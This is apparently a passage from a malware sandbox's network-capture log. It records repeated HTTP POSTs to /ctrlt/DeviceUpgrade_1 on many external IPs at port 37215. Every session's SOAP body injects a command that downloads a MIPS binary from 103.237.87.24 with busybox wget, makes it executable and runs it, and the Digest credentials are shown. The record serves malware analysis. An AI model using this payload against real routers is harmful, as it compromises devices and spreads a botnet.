6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  523192.168.2.135658841.147.93.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119406939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  524192.168.2.1349104151.86.153.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119437933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  525192.168.2.1339088146.167.211.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119497061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  526192.168.2.1334324166.81.75.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119497061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  527192.168.2.134634641.222.173.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119514942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  528192.168.2.1344786197.57.28.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120404005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  529192.168.2.1344264197.141.7.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120414972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  530192.168.2.134011641.97.15.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120439053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  531192.168.2.1348900197.232.196.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120449066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  532192.168.2.1351380201.38.49.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120727062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  533192.168.2.135424268.221.46.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120733023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
